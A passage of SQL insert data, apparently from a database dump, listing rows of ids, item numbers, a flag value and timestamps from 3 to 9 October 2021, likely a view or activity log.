06:48:49'),(35225,1600,1,'2021-10-03','2021-10-03 06:49:33'),(35226,4338,1,'2021-10-03','2021-10-03 07:04:59'),(35227,4301,1,'2021-10-03','2021-10-03 07:07:58'),(35228,2769,1,'2021-10-03','2021-10-03 07:52:28'),(35229,2309,1,'2021-10-03','2021-10-03 08:11:34'),(35230,2309,1,'2021-10-03','2021-10-03 08:32:32'),(35231,4341,1,'2021-10-03','2021-10-03 08:41:43'),(35232,1596,1,'2021-10-03','2021-10-03 09:57:33'),(35233,1614,1,'2021-10-03','2021-10-03 10:15:33'),(35234,72,1,'2021-10-03','2021-10-03 10:30:13'),(35235,3060,1,'2021-10-03','2021-10-03 10:33:35'),(35236,3710,1,'2021-10-03','2021-10-03 11:41:44'),(35237,80,1,'2021-10-03','2021-10-03 12:05:27'),(35238,1600,1,'2021-10-03','2021-10-03 12:14:59'),(35239,1606,1,'2021-10-03','2021-10-03 14:07:59'),(35240,1598,1,'2021-10-03','2021-10-03 14:57:16'),(35241,3030,1,'2021-10-03','2021-10-03 15:29:27'),(35242,3673,1,'2021-10-03','2021-10-03 15:49:20'),(35243,1600,1,'2021-10-03','2021-10-03 15:59:00'),(35244,84,1,'2021-10-03','2021-10-03 16:06:11'),(35245,3694,1,'2021-10-03','2021-10-03 16:06:39'),(35246,84,1,'2021-10-03','2021-10-03 16:06:58'),(35247,2309,1,'2021-10-03','2021-10-03 16:29:59'),(35248,1608,1,'2021-10-03','2021-10-03 16:53:50'),(35249,2457,1,'2021-10-03','2021-10-03 17:00:59'),(35250,72,1,'2021-10-03','2021-10-03 17:18:59'),(35251,3245,1,'2021-10-03','2021-10-03 17:20:01'),(35252,2248,1,'2021-10-03','2021-10-03 17:36:46'),(35253,2769,1,'2021-10-03','2021-10-03 17:49:49'),(35254,1614,1,'2021-10-03','2021-10-03 18:32:12'),(35255,1608,1,'2021-10-03','2021-10-03 18:41:03'),(35256,4400,1,'2021-10-03','2021-10-03 18:46:06'),(35257,2617,1,'2021-10-03','2021-10-03 19:05:41'),(35258,1610,1,'2021-10-03','2021-10-03 19:14:35'),(35259,2617,1,'2021-10-03','2021-10-03 19:41:18'),(35260,2248,1,'2021-10-03','2021-10-03 20:41:50'),(35261,1718,1,'2021-10-03','2021-10-03 20:44:19'),(35262,3285,1,'2021-10-03','2021-10-03 20:58:21'),(35263,3060,1,'2021-10-03','2021-10-03 21:00:16'),(35264,468,1,'2021-10-03','2021-10-03 21:34:07'),(35265,2658,1,'2021-10-03','2021-10-03 22:03:16'),(35266,485,1,'2021-10-03','2021-10-03 22:07:52'),(35267,1596,1,'2021-10-03','2021-10-03 22:14:47'),(35268,3789,1,'2021-10-03','2021-10-03 23:18:37'),(35269,72,1,'2021-10-04','2021-10-04 00:41:24'),(35270,1598,1,'2021-10-04','2021-10-04 01:58:25'),(35271,2309,1,'2021-10-04','2021-10-04 02:51:33'),(35272,1582,1,'2021-10-04','2021-10-04 03:17:47'),(35273,2769,1,'2021-10-04','2021-10-04 03:26:22'),(35274,2989,1,'2021-10-04','2021-10-04 03:31:00'),(35275,3704,1,'2021-10-04','2021-10-04 03:44:28'),(35276,3127,1,'2021-10-04','2021-10-04 03:53:58'),(35277,471,1,'2021-10-04','2021-10-04 04:02:38'),(35278,3104,1,'2021-10-04','2021-10-04 04:23:18'),(35279,3178,1,'2021-10-04','2021-10-04 04:40:12'),(35280,1608,1,'2021-10-04','2021-10-04 04:56:07'),(35281,481,1,'2021-10-04','2021-10-04 04:56:09'),(35282,1614,1,'2021-10-04','2021-10-04 05:15:58'),(35283,4448,1,'2021-10-04','2021-10-04 05:26:08'),(35284,4432,1,'2021-10-04','2021-10-04 05:26:30'),(35285,1602,1,'2021-10-04','2021-10-04 05:30:35'),(35286,4424,1,'2021-10-04','2021-10-04 05:32:21'),(35287,1608,1,'2021-10-04','2021-10-04 05:41:13'),(35288,3764,1,'2021-10-04','2021-10-04 06:11:53'),(35289,2965,1,'2021-10-04','2021-10-04 06:19:24'),(35290,2617,1,'2021-10-04','2021-10-04 06:36:35'),(35291,1588,1,'2021-10-04','2021-10-04 06:57:47'),(35292,481,1,'2021-10-04','2021-10-04 07:07:32'),(35293,1586,1,'2021-10-04','2021-10-04 07:19:27'),(35294,3104,1,'2021-10-04','2021-10-04 07:28:02'),(35295,1582,1,'2021-10-04','2021-10-04 07:45:18'),(35296,1592,1,'2021-10-04','2021-10-04 08:34:25'),(35297,1718,1,'2021-10-04','2021-10-04 08:47:56'),(35298,72,1,'2021-10-04','2021-10-04 09:07:26'),(35299,2297,1,'2021-10-04','2021-10-04 10:29:09'),(35300,3710,1,'2021-10-04','2021-10-04 11:50:08'),(35301,3710,1,'2021-10-04','2021-10-04 11:50:11'),(35302,1592,1,'2021-10-04','2021-10-04 11:53:09'),(35303,1596,1,'2021-10-04','2021-10-04 12:19:29'),(35304,4391,1,'2021-10-04','2021-10-04 13:15:54'),(35305,1602,1,'2021-10-04','2021-10-04 13:59:01'),(35306,2159,1,'2021-10-04','2021-10-04 14:41:46'),(35307,1614,1,'2021-10-04','2021-10-04 15:05:32'),(35308,76,1,'2021-10-04','2021-10-04 15:09:10'),(35309,76,1,'2021-10-04','2021-10-04 15:11:47'),(35310,2769,1,'2021-10-04','2021-10-04 15:21:18'),(35311,1588,1,'2021-10-04','2021-10-04 15:31:09'),(35312,1592,1,'2021-10-04','2021-10-04 16:31:55'),(35313,2063,1,'2021-10-04','2021-10-04 16:41:12'),(35314,1586,1,'2021-10-04','2021-10-04 17:06:04'),(35315,68,1,'2021-10-04','2021-10-04 17:06:46'),(35316,1737,1,'2021-10-04','2021-10-04 17:49:51'),(35317,1718,1,'2021-10-04','2021-10-04 17:52:41'),(35318,4416,1,'2021-10-04','2021-10-04 17:53:57'),(35319,72,1,'2021-10-04','2021-10-04 18:16:10'),(35320,1602,1,'2021-10-04','2021-10-04 18:25:29'),(35321,1780,1,'2021-10-04','2021-10-04 18:35:00'),(35322,3030,1,'2021-10-04','2021-10-04 19:16:06'),(35323,1544,1,'2021-10-04','2021-10-04 19:16:48'),(35324,1544,1,'2021-10-04','2021-10-04 19:40:48'),(35325,2297,1,'2021-10-04','2021-10-04 19:41:22'),(35326,3430,1,'2021-10-04','2021-10-04 19:50:15'),(35327,1741,1,'2021-10-04','2021-10-04 20:01:40'),(35328,1741,1,'2021-10-04','2021-10-04 20:01:52'),(35329,2297,1,'2021-10-04','2021-10-04 20:13:40'),(35330,1766,1,'2021-10-04','2021-10-04 20:20:34'),(35331,4444,1,'2021-10-04','2021-10-04 20:58:49'),(35332,4436,1,'2021-10-04','2021-10-04 21:47:17'),(35333,91,1,'2021-10-04','2021-10-04 21:56:56'),(35334,4420,1,'2021-10-04','2021-10-04 22:15:32'),(35335,2989,1,'2021-10-04','2021-10-04 22:17:15'),(35336,1596,1,'2021-10-04','2021-10-04 23:13:57'),(35337,2769,1,'2021-10-04','2021-10-04 23:24:09'),(35338,3710,1,'2021-10-04','2021-10-04 23:45:13'),(35339,2769,1,'2021-10-04','2021-10-04 23:45:49'),(35340,2410,1,'2021-10-05','2021-10-05 00:04:50'),(35341,2457,1,'2021-10-05','2021-10-05 00:14:46'),(35342,1602,1,'2021-10-05','2021-10-05 00:29:29'),(35343,80,1,'2021-10-05','2021-10-05 00:44:19'),(35344,89,1,'2021-10-05','2021-10-05 01:07:32'),(35345,1586,1,'2021-10-05','2021-10-05 01:11:09'),(35346,2965,1,'2021-10-05','2021-10-05 01:20:26'),(35347,72,1,'2021-10-05','2021-10-05 01:31:38'),(35348,469,1,'2021-10-05','2021-10-05 01:56:02'),(35349,1718,1,'2021-10-05','2021-10-05 04:11:15'),(35350,1604,1,'2021-10-05','2021-10-05 04:39:21'),(35351,1588,1,'2021-10-05','2021-10-05 04:41:17'),(35352,1604,1,'2021-10-05','2021-10-05 05:02:21'),(35353,4420,1,'2021-10-05','2021-10-05 05:09:24'),(35354,2769,1,'2021-10-05','2021-10-05 05:41:56'),(35355,1594,1,'2021-10-05','2021-10-05 05:45:52'),(35356,478,1,'2021-10-05','2021-10-05 05:55:15'),(35357,1596,1,'2021-10-05','2021-10-05 07:54:22'),(35358,3781,1,'2021-10-05','2021-10-05 08:30:01'),(35359,2991,1,'2021-10-05','2021-10-05 08:32:29'),(35360,570,1,'2021-10-05','2021-10-05 08:35:54'),(35361,2457,1,'2021-10-05','2021-10-05 08:42:47'),(35362,72,1,'2021-10-05','2021-10-05 08:55:16'),(35363,80,1,'2021-10-05','2021-10-05 09:21:11'),(35364,1602,1,'2021-10-05','2021-10-05 09:35:36'),(35365,80,1,'2021-10-05','2021-10-05 09:36:14'),(35366,68,1,'2021-10-05','2021-10-05 09:36:46'),(35367,3710,1,'2021-10-05','2021-10-05 09:59:15'),(35368,1614,1,'2021-10-05','2021-10-05 10:20:34'),(35369,2704,1,'2021-10-05','2021-10-05 10:28:39'),(35370,2309,1,'2021-10-05','2021-10-05 10:33:59'),(35371,3746,1,'2021-10-05','2021-10-05 11:02:24'),(35372,3710,1,'2021-10-05','2021-10-05 11:47:24'),(35373,3127,1,'2021-10-05','2021-10-05 12:17:25'),(35374,1728,1,'2021-10-05','2021-10-05 13:23:26'),(35375,1602,1,'2021-10-05','2021-10-05 13:24:25'),(35376,2503,1,'2021-10-05','2021-10-05 14:43:50'),(35377,1718,1,'2021-10-05','2021-10-05 14:54:44'),(35378,1594,1,'2021-10-05','2021-10-05 14:55:06'),(35379,2904,1,'2021-10-05','2021-10-05 15:01:50'),(35380,1582,1,'2021-10-05','2021-10-05 15:03:22'),(35381,1588,1,'2021-10-05','2021-10-05 15:25:02'),(35382,2769,1,'2021-10-05','2021-10-05 15:45:16'),(35383,72,1,'2021-10-05','2021-10-05 16:03:14'),(35384,72,1,'2021-10-05','2021-10-05 16:09:18'),(35385,3721,1,'2021-10-05','2021-10-05 16:21:02'),(35386,4338,1,'2021-10-05','2021-10-05 16:35:29'),(35387,76,1,'2021-10-05','2021-10-05 16:39:03'),(35388,84,1,'2021-10-05','2021-10-05 16:39:48'),(35389,3694,1,'2021-10-05','2021-10-05 16:40:43'),(35390,84,1,'2021-10-05','2021-10-05 16:43:03'),(35391,3694,1,'2021-10-05','2021-10-05 16:44:30'),(35392,87,1,'2021-10-05','2021-10-05 16:44:44'),(35393,89,1,'2021-10-05','2021-10-05 16:46:16'),(35394,1606,1,'2021-10-05','2021-10-05 16:46:56'),(35395,91,1,'2021-10-05','2021-10-05 16:47:40'),(35396,1596,1,'2021-10-05','2021-10-05 16:49:08'),(35397,4432,1,'2021-10-05','2021-10-05 16:49:43'),(35398,91,1,'2021-10-05','2021-10-05 16:51:06'),(35399,4396,1,'2021-10-05','2021-10-05 16:53:35'),(35400,91,1,'2021-10-05','2021-10-05 17:03:58'),(35401,87,1,'2021-10-05','2021-10-05 17:04:25'),(35402,488,1,'2021-10-05','2021-10-05 17:04:31'),(35403,1606,1,'2021-10-05','2021-10-05 17:04:32'),(35404,68,1,'2021-10-05','2021-10-05 17:04:42'),(35405,2503,1,'2021-10-05','2021-10-05 17:09:19'),(35406,76,1,'2021-10-05','2021-10-05 17:09:33'),(35407,1606,1,'2021-10-05','2021-10-05 17:10:10'),(35408,89,1,'2021-10-05','2021-10-05 17:10:30'),(35409,87,1,'2021-10-05','2021-10-05 17:10:47'),(35410,3694,1,'2021-10-05','2021-10-05 17:10:55'),(35411,76,1,'2021-10-05','2021-10-05 17:11:00'),(35412,91,1,'2021-10-05','2021-10-05 17:11:32'),(35413,87,1,'2021-10-05','2021-10-05 17:17:21'),(35414,91,1,'2021-10-05','2021-10-05 17:35:35'),(35415,4404,1,'2021-10-05','2021-10-05 17:35:46'),(35416,4428,1,'2021-10-05','2021-10-05 17:51:19'),(35417,3030,1,'2021-10-05','2021-10-05 17:55:31'),(35418,68,1,'2021-10-05','2021-10-05 17:56:24'),(35419,2503,1,'2021-10-05','2021-10-05 18:06:50'),(35420,2503,1,'2021-10-05','2021-10-05 18:08:59'),(35421,2503,1,'2021-10-05','2021-10-05 18:12:21'),(35422,2309,1,'2021-10-05','2021-10-05 18:14:08'),(35423,2309,1,'2021-10-05','2021-10-05 18:14:11'),(35424,2503,1,'2021-10-05','2021-10-05 18:28:03'),(35425,1586,1,'2021-10-05','2021-10-05 18:45:33'),(35426,467,1,'2021-10-05','2021-10-05 18:46:54'),(35427,2152,1,'2021-10-05','2021-10-05 18:50:19'),(35428,1602,1,'2021-10-05','2021-10-05 19:03:27'),(35429,1720,1,'2021-10-05','2021-10-05 19:06:23'),(35430,1720,1,'2021-10-05','2021-10-05 19:10:18'),(35431,1720,1,'2021-10-05','2021-10-05 19:10:28'),(35432,1720,1,'2021-10-05','2021-10-05 19:20:36'),(35433,2457,1,'2021-10-05','2021-10-05 19:38:08'),(35434,2809,1,'2021-10-05','2021-10-05 20:33:22'),(35435,3781,1,'2021-10-05','2021-10-05 21:02:35'),(35436,72,1,'2021-10-05','2021-10-05 21:06:26'),(35437,68,1,'2021-10-05','2021-10-05 21:17:35'),(35438,3290,1,'2021-10-05','2021-10-05 21:52:16'),(35439,2809,1,'2021-10-05','2021-10-05 22:09:15'),(35440,3087,1,'2021-10-05','2021-10-05 22:24:38'),(35441,2503,1,'2021-10-05','2021-10-05 22:53:22'),(35442,1602,1,'2021-10-05','2021-10-05 23:04:43'),(35443,2609,1,'2021-10-05','2021-10-05 23:16:27'),(35444,76,1,'2021-10-05','2021-10-05 23:17:20'),(35445,91,1,'2021-10-05','2021-10-05 23:20:06'),(35446,4440,1,'2021-10-05','2021-10-05 23:21:51'),(35447,3764,1,'2021-10-05','2021-10-05 23:29:28'),(35448,2911,1,'2021-10-05','2021-10-05 23:30:31'),(35449,3781,1,'2021-10-05','2021-10-05 23:54:11'),(35450,3030,1,'2021-10-05','2021-10-05 23:55:00'),(35451,474,1,'2021-10-06','2021-10-06 00:47:25'),(35452,1588,1,'2021-10-06','2021-10-06 00:50:24'),(35453,3789,1,'2021-10-06','2021-10-06 01:00:34'),(35454,72,1,'2021-10-06','2021-10-06 01:06:25'),(35455,2769,1,'2021-10-06','2021-10-06 01:21:01'),(35456,472,1,'2021-10-06','2021-10-06 01:40:34'),(35457,1594,1,'2021-10-06','2021-10-06 03:06:45'),(35458,1596,1,'2021-10-06','2021-10-06 03:51:44'),(35459,1718,1,'2021-10-06','2021-10-06 04:01:43'),(35460,91,1,'2021-10-06','2021-10-06 05:38:23'),(35461,102,1,'2021-10-06','2021-10-06 05:56:30'),(35462,3087,1,'2021-10-06','2021-10-06 06:07:38'),(35463,3710,1,'2021-10-06','2021-10-06 06:20:35'),(35464,2503,1,'2021-10-06','2021-10-06 06:58:23'),(35465,1582,1,'2021-10-06','2021-10-06 07:24:37'),(35466,1598,1,'2021-10-06','2021-10-06 08:07:27'),(35467,1592,1,'2021-10-06','2021-10-06 08:59:50'),(35468,4301,1,'2021-10-06','2021-10-06 09:26:57'),(35469,335,1,'2021-10-06','2021-10-06 09:28:56'),(35470,72,1,'2021-10-06','2021-10-06 09:30:18'),(35471,76,1,'2021-10-06','2021-10-06 09:31:31'),(35472,335,1,'2021-10-06','2021-10-06 09:40:10'),(35473,4301,1,'2021-10-06','2021-10-06 09:40:14'),(35474,1749,1,'2021-10-06','2021-10-06 09:47:22'),(35475,1749,1,'2021-10-06','2021-10-06 09:48:08'),(35476,3313,1,'2021-10-06','2021-10-06 10:11:16'),(35477,2309,1,'2021-10-06','2021-10-06 10:35:54'),(35478,2309,1,'2021-10-06','2021-10-06 10:35:56'),(35479,2309,1,'2021-10-06','2021-10-06 10:40:20'),(35480,2309,1,'2021-10-06','2021-10-06 10:40:24'),(35481,91,1,'2021-10-06','2021-10-06 10:41:14'),(35482,87,1,'2021-10-06','2021-10-06 10:41:15'),(35483,87,1,'2021-10-06','2021-10-06 10:41:23'),(35484,487,1,'2021-10-06','2021-10-06 10:41:37'),(35485,487,1,'2021-10-06','2021-10-06 10:41:46'),(35486,4332,1,'2021-10-06','2021-10-06 10:42:13'),(35487,1711,1,'2021-10-06','2021-10-06 10:44:14'),(35488,1711,1,'2021-10-06','2021-10-06 10:44:40'),(35489,1711,1,'2021-10-06','2021-10-06 10:51:28'),(35490,91,1,'2021-10-06','2021-10-06 11:48:32'),(35491,1602,1,'2021-10-06','2021-10-06 11:58:21'),(35492,3127,1,'2021-10-06','2021-10-06 12:09:11'),(35493,84,1,'2021-10-06','2021-10-06 12:11:31'),(35494,3664,1,'2021-10-06','2021-10-06 12:14:36'),(35495,3691,1,'2021-10-06','2021-10-06 12:16:19'),(35496,84,1,'2021-10-06','2021-10-06 12:16:40'),(35497,1877,1,'2021-10-06','2021-10-06 12:17:09'),(35498,3030,1,'2021-10-06','2021-10-06 13:03:06'),(35499,3787,1,'2021-10-06','2021-10-06 13:12:36'),(35500,4373,1,'2021-10-06','2021-10-06 13:28:10'),(35501,4448,1,'2021-10-06','2021-10-06 13:34:29'),(35502,1586,1,'2021-10-06','2021-10-06 14:05:26'),(35503,1594,1,'2021-10-06','2021-10-06 14:20:32'),(35504,1594,1,'2021-10-06','2021-10-06 14:20:35'),(35505,4238,1,'2021-10-06','2021-10-06 14:34:55'),(35506,102,1,'2021-10-06','2021-10-06 14:36:40'),(35507,2769,1,'2021-10-06','2021-10-06 15:42:25'),(35508,1602,1,'2021-10-06','2021-10-06 16:35:06'),(35509,1602,1,'2021-10-06','2021-10-06 16:35:10'),(35510,3781,1,'2021-10-06','2021-10-06 16:37:19'),(35511,1728,1,'2021-10-06','2021-10-06 16:38:35'),(35512,1728,1,'2021-10-06','2021-10-06 16:39:48'),(35513,4238,1,'2021-10-06','2021-10-06 17:13:04'),(35514,1604,1,'2021-10-06','2021-10-06 17:29:02'),(35515,1602,1,'2021-10-06','2021-10-06 17:53:02'),(35516,1737,1,'2021-10-06','2021-10-06 18:02:56'),(35517,1594,1,'2021-10-06','2021-10-06 18:20:42'),(35518,72,1,'2021-10-06','2021-10-06 18:30:16'),(35519,3030,1,'2021-10-06','2021-10-06 18:33:28'),(35520,1588,1,'2021-10-06','2021-10-06 18:36:39'),(35521,3749,1,'2021-10-06','2021-10-06 18:38:37'),(35522,3749,1,'2021-10-06','2021-10-06 18:47:34'),(35523,3290,1,'2021-10-06','2021-10-06 19:05:31'),(35524,1586,1,'2021-10-06','2021-10-06 19:06:01'),(35525,3058,1,'2021-10-06','2021-10-06 19:06:02'),(35526,1582,1,'2021-10-06','2021-10-06 19:23:19'),(35527,4404,1,'2021-10-06','2021-10-06 19:33:48'),(35528,4341,1,'2021-10-06','2021-10-06 19:35:51'),(35529,1602,1,'2021-10-06','2021-10-06 19:41:14'),(35530,2297,1,'2021-10-06','2021-10-06 19:46:58'),(35531,2309,1,'2021-10-06','2021-10-06 20:08:51'),(35532,3058,1,'2021-10-06','2021-10-06 20:16:38'),(35533,2658,1,'2021-10-06','2021-10-06 20:20:34'),(35534,3746,1,'2021-10-06','2021-10-06 20:44:13'),(35535,2658,1,'2021-10-06','2021-10-06 20:47:13'),(35536,2658,1,'2021-10-06','2021-10-06 20:47:44'),(35537,2658,1,'2021-10-06','2021-10-06 20:48:06'),(35538,3055,1,'2021-10-06','2021-10-06 21:20:26'),(35539,72,1,'2021-10-06','2021-10-06 21:43:59'),(35540,80,1,'2021-10-06','2021-10-06 21:45:04'),(35541,2154,1,'2021-10-06','2021-10-06 21:46:41'),(35542,3087,1,'2021-10-06','2021-10-06 21:53:48'),(35543,3781,1,'2021-10-06','2021-10-06 22:10:42'),(35544,1772,1,'2021-10-06','2021-10-06 22:36:53'),(35545,1718,1,'2021-10-06','2021-10-06 23:26:57'),(35546,1870,1,'2021-10-07','2021-10-07 00:06:54'),(35547,91,1,'2021-10-07','2021-10-07 01:19:30'),(35548,3738,1,'2021-10-07','2021-10-07 02:53:14'),(35549,2956,1,'2021-10-07','2021-10-07 03:03:07'),(35550,1604,1,'2021-10-07','2021-10-07 03:10:07'),(35551,84,1,'2021-10-07','2021-10-07 03:27:13'),(35552,89,1,'2021-10-07','2021-10-07 03:53:35'),(35553,2617,1,'2021-10-07','2021-10-07 04:17:59'),(35554,2769,1,'2021-10-07','2021-10-07 04:42:11'),(35555,2297,1,'2021-10-07','2021-10-07 04:52:10'),(35556,3680,1,'2021-10-07','2021-10-07 04:54:31'),(35557,472,1,'2021-10-07','2021-10-07 05:21:32'),(35558,72,1,'2021-10-07','2021-10-07 05:28:19'),(35559,2309,1,'2021-10-07','2021-10-07 05:28:24'),(35560,80,1,'2021-10-07','2021-10-07 05:45:28'),(35561,3290,1,'2021-10-07','2021-10-07 05:54:52'),(35562,3781,1,'2021-10-07','2021-10-07 06:01:32'),(35563,1770,1,'2021-10-07','2021-10-07 06:02:24'),(35564,3781,1,'2021-10-07','2021-10-07 06:08:16'),(35565,1592,1,'2021-10-07','2021-10-07 06:28:30'),(35566,1582,1,'2021-10-07','2021-10-07 06:35:15'),(35567,3251,1,'2021-10-07','2021-10-07 06:38:02'),(35568,1598,1,'2021-10-07','2021-10-07 06:48:42'),(35569,1596,1,'2021-10-07','2021-10-07 07:03:00'),(35570,1592,1,'2021-10-07','2021-10-07 07:05:09'),(35571,1594,1,'2021-10-07','2021-10-07 07:21:37'),(35572,2154,1,'2021-10-07','2021-10-07 07:23:33'),(35573,1614,1,'2021-10-07','2021-10-07 07:41:58'),(35574,72,1,'2021-10-07','2021-10-07 07:49:01'),(35575,4400,1,'2021-10-07','2021-10-07 07:57:27'),(35576,3691,1,'2021-10-07','2021-10-07 08:03:55'),(35577,2503,1,'2021-10-07','2021-10-07 09:10:31'),(35578,2503,1,'2021-10-07','2021-10-07 09:10:31'),(35579,3051,1,'2021-10-07','2021-10-07 09:18:20'),(35580,3789,1,'2021-10-07','2021-10-07 09:19:14'),(35581,1588,1,'2021-10-07','2021-10-07 09:37:27'),(35582,1588,1,'2021-10-07','2021-10-07 10:17:51'),(35583,1718,1,'2021-10-07','2021-10-07 10:38:15'),(35584,4400,1,'2021-10-07','2021-10-07 11:11:37'),(35585,72,1,'2021-10-07','2021-10-07 11:55:28'),(35586,80,1,'2021-10-07','2021-10-07 12:11:06'),(35587,2297,1,'2021-10-07','2021-10-07 12:25:38'),(35588,2154,1,'2021-10-07','2021-10-07 12:35:48'),(35589,2911,1,'2021-10-07','2021-10-07 12:36:04'),(35590,1588,1,'2021-10-07','2021-10-07 12:45:47'),(35591,1612,1,'2021-10-07','2021-10-07 12:54:37'),(35592,2609,1,'2021-10-07','2021-10-07 12:59:52'),(35593,1592,1,'2021-10-07','2021-10-07 13:11:36'),(35594,1582,1,'2021-10-07','2021-10-07 13:31:19'),(35595,2769,1,'2021-10-07','2021-10-07 13:56:44'),(35596,2751,1,'2021-10-07','2021-10-07 14:03:56'),(35597,2309,1,'2021-10-07','2021-10-07 14:22:32'),(35598,4357,1,'2021-10-07','2021-10-07 14:33:13'),(35599,4238,1,'2021-10-07','2021-10-07 14:35:38'),(35600,3781,1,'2021-10-07','2021-10-07 14:51:02'),(35601,472,1,'2021-10-07','2021-10-07 15:05:06'),(35602,3253,1,'2021-10-07','2021-10-07 15:05:23'),(35603,3253,1,'2021-10-07','2021-10-07 15:06:17'),(35604,3253,1,'2021-10-07','2021-10-07 15:06:34'),(35605,3253,1,'2021-10-07','2021-10-07 15:06:39'),(35606,1596,1,'2021-10-07','2021-10-07 15:48:13'),(35607,1592,1,'2021-10-07','2021-10-07 15:50:03'),(35608,3781,1,'2021-10-07','2021-10-07 15:54:23'),(35609,2769,1,'2021-10-07','2021-10-07 15:57:53'),(35610,4368,1,'2021-10-07','2021-10-07 16:46:52'),(35611,2911,1,'2021-10-07','2021-10-07 17:11:23'),(35612,1600,1,'2021-10-07','2021-10-07 17:39:04'),(35613,72,1,'2021-10-07','2021-10-07 18:31:12'),(35614,2609,1,'2021-10-07','2021-10-07 18:50:03'),(35615,2804,1,'2021-10-07','2021-10-07 18:58:32'),(35616,3030,1,'2021-10-07','2021-10-07 19:13:49'),(35617,72,1,'2021-10-07','2021-10-07 19:19:18'),(35618,4341,1,'2021-10-07','2021-10-07 21:04:08'),(35619,1606,1,'2021-10-07','2021-10-07 21:24:18'),(35620,1588,1,'2021-10-07','2021-10-07 22:24:58'),(35621,2769,1,'2021-10-07','2021-10-07 22:34:58'),(35622,1718,1,'2021-10-07','2021-10-07 22:45:03'),(35623,1606,1,'2021-10-07','2021-10-07 22:55:10'),(35624,1588,1,'2021-10-07','2021-10-07 23:05:01'),(35625,1544,1,'2021-10-07','2021-10-07 23:34:40'),(35626,3030,1,'2021-10-08','2021-10-08 00:01:26'),(35627,3030,1,'2021-10-08','2021-10-08 00:04:50'),(35628,3245,1,'2021-10-08','2021-10-08 00:14:51'),(35629,3245,1,'2021-10-08','2021-10-08 00:34:48'),(35630,3482,1,'2021-10-08','2021-10-08 00:45:10'),(35631,1602,1,'2021-10-08','2021-10-08 01:34:51'),(35632,1602,1,'2021-10-08','2021-10-08 01:34:59'),(35633,3253,1,'2021-10-08','2021-10-08 01:35:32'),(35634,80,1,'2021-10-08','2021-10-08 01:35:52'),(35635,80,1,'2021-10-08','2021-10-08 01:36:04'),(35636,2503,1,'2021-10-08','2021-10-08 01:58:12'),(35637,1870,1,'2021-10-08','2021-10-08 02:25:30'),(35638,4420,1,'2021-10-08','2021-10-08 02:47:59'),(35639,1594,1,'2021-10-08','2021-10-08 02:48:12'),(35640,1588,1,'2021-10-08','2021-10-08 02:49:05'),(35641,72,1,'2021-10-08','2021-10-08 03:18:26'),(35642,1544,1,'2021-10-08','2021-10-08 04:07:07'),(35643,3313,1,'2021-10-08','2021-10-08 04:17:59'),(35644,1596,1,'2021-10-08','2021-10-08 05:37:17'),(35645,1582,1,'2021-10-08','2021-10-08 05:43:22'),(35646,2457,1,'2021-10-08','2021-10-08 05:54:18'),(35647,68,1,'2021-10-08','2021-10-08 05:55:41'),(35648,68,1,'2021-10-08','2021-10-08 05:56:21'),(35649,2457,1,'2021-10-08','2021-10-08 05:56:26'),(35650,4341,1,'2021-10-08','2021-10-08 06:59:04'),(35651,1588,1,'2021-10-08','2021-10-08 07:47:50'),(35652,1588,1,'2021-10-08','2021-10-08 07:48:38'),(35653,2503,1,'2021-10-08','2021-10-08 08:07:27'),(35654,2769,1,'2021-10-08','2021-10-08 08:18:16'),(35655,1588,1,'2021-10-08','2021-10-08 09:51:46'),(35656,1594,1,'2021-10-08','2021-10-08 10:30:34'),(35657,1586,1,'2021-10-08','2021-10-08 11:07:50'),(35658,1602,1,'2021-10-08','2021-10-08 11:17:11'),(35659,1582,1,'2021-10-08','2021-10-08 12:51:04'),(35660,87,1,'2021-10-08','2021-10-08 13:06:19'),(35661,481,1,'2021-10-08','2021-10-08 13:06:31'),(35662,89,1,'2021-10-08','2021-10-08 13:11:41'),(35663,1582,1,'2021-10-08','2021-10-08 13:11:47'),(35664,91,1,'2021-10-08','2021-10-08 13:12:51'),(35665,4436,1,'2021-10-08','2021-10-08 13:25:43'),(35666,87,1,'2021-10-08','2021-10-08 13:33:25'),(35667,481,1,'2021-10-08','2021-10-08 13:33:36'),(35668,3087,1,'2021-10-08','2021-10-08 14:02:34'),(35669,1612,1,'2021-10-08','2021-10-08 14:05:56'),(35670,2775,1,'2021-10-08','2021-10-08 14:40:41'),(35671,1596,1,'2021-10-08','2021-10-08 14:59:24'),(35672,1602,1,'2021-10-08','2021-10-08 16:48:33'),(35673,1598,1,'2021-10-08','2021-10-08 17:34:58'),(35674,1588,1,'2021-10-08','2021-10-08 17:41:10'),(35675,1711,1,'2021-10-08','2021-10-08 17:59:22'),(35676,91,1,'2021-10-08','2021-10-08 19:09:58'),(35677,72,1,'2021-10-08','2021-10-08 19:44:08'),(35678,3030,1,'2021-10-08','2021-10-08 20:52:33'),(35679,3030,1,'2021-10-08','2021-10-08 20:54:49'),(35680,2658,1,'2021-10-08','2021-10-08 21:05:41'),(35681,1600,1,'2021-10-08','2021-10-08 22:57:21'),(35682,3030,1,'2021-10-09','2021-10-09 00:25:40'),(35683,1606,1,'2021-10-09','2021-10-09 00:25:41'),(35684,1600,1,'2021-10-09','2021-10-09 00:27:23'),(35685,1718,1,'2021-10-09','2021-10-09 00:45:39'),(35686,2769,1,'2021-10-09','2021-10-09 01:40:01'),(35687,1612,1,'2021-10-09','2021-10-09 02:18:49'),(35688,1604,1,'2021-10-09','2021-10-09 03:03:48'),(35689,2420,1,'2021-10-09','2021-10-09 03:06:41'),(35690,2420,1,'2021-10-09','2021-10-09 03:06:51'),(35691,1588,1,'2021-10-09','2021-10-09 03:07:50'),(35692,1596,1,'2021-10-09','2021-10-09 03:17:57'),(35693,3764,1,'2021-10-09','2021-10-09 04:11:25'),(35694,3245,1,'2021-10-09','2021-10-09 04:48:37'),(35695,1582,1,'2021-10-09','2021-10-09 05:13:03'),(35696,2297,1,'2021-10-09','2021-10-09 06:09:59'),(35697,1606,1,'2021-10-09','2021-10-09 07:00:34'),(35698,1588,1,'2021-10-09','2021-10-09 07:00:41'),(35699,2297,1,'2021-10-09','2021-10-09 07:00:45'),(35700,4341,1,'2021-10-09','2021-10-09 08:01:14'),(35701,1778,1,'2021-10-09','2021-10-09 08:09:47'),(35702,1778,1,'2021-10-09','2021-10-09 08:10:00'),(35703,1778,1,'2021-10-09','2021-10-09 08:10:17'),(35704,1778,1,'2021-10-09','2021-10-09 08:10:36'),(35705,1778,1,'2021-10-09','2021-10-09 08:10:53'),(35706,1774,1,'2021-10-09','2021-10-09 08:14:41'),(35707,472,1,'2021-10-09','2021-10-09 08:42:45'),(35708,1718,1,'2021-10-09','2021-10-09 09:19:40'),(35709,1586,1,'2021-10-09','2021-10-09 09:43:39'),(35710,2813,1,'2021-10-09','2021-10-09 10:02:24'),(35711,3691,1,'2021-10-09','2021-10-09 